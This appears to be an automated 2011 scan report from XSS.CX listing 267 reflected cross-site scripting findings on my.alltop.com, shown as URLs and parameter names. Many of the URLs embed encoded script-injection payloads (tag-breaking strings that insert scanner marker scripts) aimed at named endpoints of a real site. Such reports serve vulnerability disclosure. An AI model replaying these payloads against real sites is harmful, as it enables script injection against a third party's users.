XSS, my.alltop.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Wed Mar 09 13:01:52 CST 2011.


The DORK Report


1. Cross-site scripting (reflected)

1.1. http://my.alltop.com/ ['"--> parameter]

1.2. http://my.alltop.com/ [name of an arbitrarily supplied request parameter]

1.3. http://my.alltop.com/ [nsextt parameter]

1.4. http://my.alltop.com/adamengst [name of an arbitrarily supplied request parameter]

1.5. http://my.alltop.com/adamengst [nsextt parameter]

1.6. http://my.alltop.com/alisonvandiggelen [name of an arbitrarily supplied request parameter]

1.7. http://my.alltop.com/alisonvandiggelen [nsextt parameter]

1.8. http://my.alltop.com/alpha/ ['"--> parameter]

1.9. http://my.alltop.com/alpha/ [name of an arbitrarily supplied request parameter]

1.10. http://my.alltop.com/alpha/ [nsextt parameter]

1.11. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 2]

1.12. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 3]

1.13. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 4]

1.14. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 5]

1.15. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.16. http://my.alltop.com/alpha//%22ns=%22netsparker(0x00013A) [REST URL parameter 2]

1.17. http://my.alltop.com/alpha//%22ns=%22netsparker(0x00013A) [name of an arbitrarily supplied request parameter]

1.18. http://my.alltop.com/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529) [REST URL parameter 2]

1.19. http://my.alltop.com/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529) [name of an arbitrarily supplied request parameter]

1.20. http://my.alltop.com/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/ [REST URL parameter 2]

1.21. http://my.alltop.com/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/ [name of an arbitrarily supplied request parameter]

1.22. http://my.alltop.com/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/ [REST URL parameter 2]

1.23. http://my.alltop.com/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/ [name of an arbitrarily supplied request parameter]

1.24. http://my.alltop.com/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/ [REST URL parameter 2]

1.25. http://my.alltop.com/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/ [name of an arbitrarily supplied request parameter]

1.26. http://my.alltop.com/alpha/a [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E parameter]

1.27. http://my.alltop.com/alpha/a ['"--> parameter]

1.28. http://my.alltop.com/alpha/a [REST URL parameter 2]

1.29. http://my.alltop.com/alpha/a [name of an arbitrarily supplied request parameter]

1.30. http://my.alltop.com/alpha/a [nsextt parameter]

1.31. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 2]

1.32. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 3]

1.33. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 4]

1.34. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 5]

1.35. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.36. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [REST URL parameter 2]

1.37. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [REST URL parameter 3]

1.38. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [name of an arbitrarily supplied request parameter]

1.39. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [REST URL parameter 2]

1.40. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [REST URL parameter 3]

1.41. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [name of an arbitrarily supplied request parameter]

1.42. http://my.alltop.com/alpha/b ['"--> parameter]

1.43. http://my.alltop.com/alpha/b [REST URL parameter 2]

1.44. http://my.alltop.com/alpha/b [name of an arbitrarily supplied request parameter]

1.45. http://my.alltop.com/alpha/b [nsextt parameter]

1.46. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 2]

1.47. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 3]

1.48. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 4]

1.49. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 5]

1.50. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.51. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [REST URL parameter 2]

1.52. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [REST URL parameter 3]

1.53. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [name of an arbitrarily supplied request parameter]

1.54. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [REST URL parameter 2]

1.55. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [REST URL parameter 3]

1.56. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [name of an arbitrarily supplied request parameter]

1.57. http://my.alltop.com/alpha/c ['"--> parameter]

1.58. http://my.alltop.com/alpha/c [REST URL parameter 2]

1.59. http://my.alltop.com/alpha/c [name of an arbitrarily supplied request parameter]

1.60. http://my.alltop.com/alpha/c [nsextt parameter]

1.61. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 2]

1.62. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 3]

1.63. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 4]

1.64. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 5]

1.65. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.66. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [REST URL parameter 2]

1.67. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [REST URL parameter 3]

1.68. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [name of an arbitrarily supplied request parameter]

1.69. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [REST URL parameter 2]

1.70. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [REST URL parameter 3]

1.71. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [name of an arbitrarily supplied request parameter]

1.72. http://my.alltop.com/alpha/d ['"--> parameter]

1.73. http://my.alltop.com/alpha/d [REST URL parameter 2]

1.74. http://my.alltop.com/alpha/d [name of an arbitrarily supplied request parameter]

1.75. http://my.alltop.com/alpha/d [nsextt parameter]

1.76. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 2]

1.77. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 3]

1.78. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 4]

1.79. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 5]

1.80. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.81. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [REST URL parameter 2]

1.82. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [REST URL parameter 3]

1.83. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [name of an arbitrarily supplied request parameter]

1.84. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [REST URL parameter 2]

1.85. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [REST URL parameter 3]

1.86. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [name of an arbitrarily supplied request parameter]

1.87. http://my.alltop.com/alpha/e ['"--> parameter]

1.88. http://my.alltop.com/alpha/e [REST URL parameter 2]

1.89. http://my.alltop.com/alpha/e [name of an arbitrarily supplied request parameter]

1.90. http://my.alltop.com/alpha/e [nsextt parameter]

1.91. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 2]

1.92. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 3]

1.93. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 4]

1.94. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 5]

1.95. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.96. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [REST URL parameter 2]

1.97. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [REST URL parameter 3]

1.98. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [name of an arbitrarily supplied request parameter]

1.99. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [REST URL parameter 2]

1.100. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [REST URL parameter 3]

1.101. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [name of an arbitrarily supplied request parameter]

1.102. http://my.alltop.com/alpha/f ['"--> parameter]

1.103. http://my.alltop.com/alpha/f [REST URL parameter 2]

1.104. http://my.alltop.com/alpha/f [name of an arbitrarily supplied request parameter]

1.105. http://my.alltop.com/alpha/f [nsextt parameter]

1.106. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 2]

1.107. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 3]

1.108. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 4]

1.109. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 5]

1.110. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.111. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [REST URL parameter 2]

1.112. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [REST URL parameter 3]

1.113. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [name of an arbitrarily supplied request parameter]

1.114. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [REST URL parameter 2]

1.115. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [REST URL parameter 3]

1.116. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [name of an arbitrarily supplied request parameter]

1.117. http://my.alltop.com/alpha/g ['"--> parameter]

1.118. http://my.alltop.com/alpha/g [REST URL parameter 2]

1.119. http://my.alltop.com/alpha/g [name of an arbitrarily supplied request parameter]

1.120. http://my.alltop.com/alpha/g [nsextt parameter]

1.121. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 2]

1.122. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 3]

1.123. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 4]

1.124. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 5]

1.125. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.126. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [REST URL parameter 2]

1.127. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [REST URL parameter 3]

1.128. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [name of an arbitrarily supplied request parameter]

1.129. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [REST URL parameter 2]

1.130. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [REST URL parameter 3]

1.131. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [name of an arbitrarily supplied request parameter]

1.132. http://my.alltop.com/alpha/h ['"--> parameter]

1.133. http://my.alltop.com/alpha/h [REST URL parameter 2]

1.134. http://my.alltop.com/alpha/h [name of an arbitrarily supplied request parameter]

1.135. http://my.alltop.com/alpha/h [nsextt parameter]

1.136. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 2]

1.137. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 3]

1.138. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 4]

1.139. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 5]

1.140. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.141. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [REST URL parameter 2]

1.142. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [REST URL parameter 3]

1.143. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [name of an arbitrarily supplied request parameter]

1.144. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [REST URL parameter 2]

1.145. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [REST URL parameter 3]

1.146. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [name of an arbitrarily supplied request parameter]

1.147. http://my.alltop.com/alpha/i ['"--> parameter]

1.148. http://my.alltop.com/alpha/i [REST URL parameter 2]

1.149. http://my.alltop.com/alpha/i [name of an arbitrarily supplied request parameter]

1.150. http://my.alltop.com/alpha/i [nsextt parameter]

1.151. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 2]

1.152. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 3]

1.153. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 4]

1.154. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 5]

1.155. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.156. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [REST URL parameter 2]

1.157. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [REST URL parameter 3]

1.158. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [name of an arbitrarily supplied request parameter]

1.159. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [REST URL parameter 2]

1.160. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [REST URL parameter 3]

1.161. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [name of an arbitrarily supplied request parameter]

1.162. http://my.alltop.com/alpha/j [REST URL parameter 2]

1.163. http://my.alltop.com/alpha/j [name of an arbitrarily supplied request parameter]

1.164. http://my.alltop.com/alpha/k [REST URL parameter 2]

1.165. http://my.alltop.com/alpha/k [name of an arbitrarily supplied request parameter]

1.166. http://my.alltop.com/alpha/l [REST URL parameter 2]

1.167. http://my.alltop.com/alpha/l [name of an arbitrarily supplied request parameter]

1.168. http://my.alltop.com/alpha/m [REST URL parameter 2]

1.169. http://my.alltop.com/alpha/n [REST URL parameter 2]

1.170. http://my.alltop.com/alpha/n [name of an arbitrarily supplied request parameter]

1.171. http://my.alltop.com/alpha/o ['"--> parameter]

1.172. http://my.alltop.com/alpha/o [REST URL parameter 2]

1.173. http://my.alltop.com/alpha/o [name of an arbitrarily supplied request parameter]

1.174. http://my.alltop.com/alpha/o [nsextt parameter]

1.175. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 2]

1.176. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 3]

1.177. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 4]

1.178. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 5]

1.179. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.180. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [REST URL parameter 2]

1.181. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [REST URL parameter 3]

1.182. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [name of an arbitrarily supplied request parameter]

1.183. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [REST URL parameter 2]

1.184. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [REST URL parameter 3]

1.185. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [name of an arbitrarily supplied request parameter]

1.186. http://my.alltop.com/alpha/p ['"--> parameter]

1.187. http://my.alltop.com/alpha/p [REST URL parameter 2]

1.188. http://my.alltop.com/alpha/p [name of an arbitrarily supplied request parameter]

1.189. http://my.alltop.com/alpha/p [nsextt parameter]

1.190. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 2]

1.191. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 3]

1.192. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 4]

1.193. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 5]

1.194. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.195. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [REST URL parameter 2]

1.196. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [REST URL parameter 3]

1.197. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [name of an arbitrarily supplied request parameter]

1.198. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [REST URL parameter 2]

1.199. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [REST URL parameter 3]

1.200. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [name of an arbitrarily supplied request parameter]

1.201. http://my.alltop.com/alpha/q [REST URL parameter 2]

1.202. http://my.alltop.com/alpha/q [name of an arbitrarily supplied request parameter]

1.203. http://my.alltop.com/alpha/r [REST URL parameter 2]

1.204. http://my.alltop.com/alpha/r [name of an arbitrarily supplied request parameter]

1.205. http://my.alltop.com/alpha/s [REST URL parameter 2]

1.206. http://my.alltop.com/alpha/s [name of an arbitrarily supplied request parameter]

1.207. http://my.alltop.com/alpha/t ['"--> parameter]

1.208. http://my.alltop.com/alpha/t [REST URL parameter 2]

1.209. http://my.alltop.com/alpha/t [name of an arbitrarily supplied request parameter]

1.210. http://my.alltop.com/alpha/t [nsextt parameter]

1.211. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 2]

1.212. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 3]

1.213. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 4]

1.214. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 5]

1.215. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.216. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [REST URL parameter 2]

1.217. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [REST URL parameter 3]

1.218. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [name of an arbitrarily supplied request parameter]

1.219. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [REST URL parameter 2]

1.220. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [REST URL parameter 3]

1.221. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [name of an arbitrarily supplied request parameter]

1.222. http://my.alltop.com/alpha/u [REST URL parameter 2]

1.223. http://my.alltop.com/alpha/u [name of an arbitrarily supplied request parameter]

1.224. http://my.alltop.com/alpha/v [REST URL parameter 2]

1.225. http://my.alltop.com/alpha/v [name of an arbitrarily supplied request parameter]

1.226. http://my.alltop.com/alpha/w ['"--> parameter]

1.227. http://my.alltop.com/alpha/w [REST URL parameter 2]

1.228. http://my.alltop.com/alpha/w [name of an arbitrarily supplied request parameter]

1.229. http://my.alltop.com/alpha/w [nsextt parameter]

1.230. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 2]

1.231. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 3]

1.232. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 4]

1.233. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 5]

1.234. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.235. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [REST URL parameter 2]

1.236. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [REST URL parameter 3]

1.237. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [name of an arbitrarily supplied request parameter]

1.238. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [REST URL parameter 2]

1.239. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [REST URL parameter 3]

1.240. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [name of an arbitrarily supplied request parameter]

1.241. http://my.alltop.com/alpha/x [REST URL parameter 2]

1.242. http://my.alltop.com/alpha/x [name of an arbitrarily supplied request parameter]

1.243. http://my.alltop.com/alpha/y ['"--> parameter]

1.244. http://my.alltop.com/alpha/y [REST URL parameter 2]

1.245. http://my.alltop.com/alpha/y [name of an arbitrarily supplied request parameter]

1.246. http://my.alltop.com/alpha/y [nsextt parameter]

1.247. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 2]

1.248. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 3]

1.249. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 4]

1.250. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 5]

1.251. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.252. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [REST URL parameter 2]

1.253. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [REST URL parameter 3]

1.254. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [name of an arbitrarily supplied request parameter]

1.255. http://my.alltop.com/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529) [REST URL parameter 2]

1.256. http://my.alltop.com/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529) [REST URL parameter 3]

1.257. http://my.alltop.com/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529) [name of an arbitrarily supplied request parameter]

1.258. http://my.alltop.com/alpha/z [REST URL parameter 2]

1.259. http://my.alltop.com/alpha/z [name of an arbitrarily supplied request parameter]

1.260. http://my.alltop.com/alpha/z [nsextt parameter]

1.261. http://my.alltop.com/css/ ['"--> parameter]

1.262. http://my.alltop.com/css/ [name of an arbitrarily supplied request parameter]

1.263. http://my.alltop.com/css/ [nsextt parameter]

1.264. http://my.alltop.com/img/ [name of an arbitrarily supplied request parameter]

1.265. http://my.alltop.com/img/ [nsextt parameter]

1.266. http://my.alltop.com/img/mugs/ [name of an arbitrarily supplied request parameter]

1.267. http://my.alltop.com/img/mugs/ [nsextt parameter]

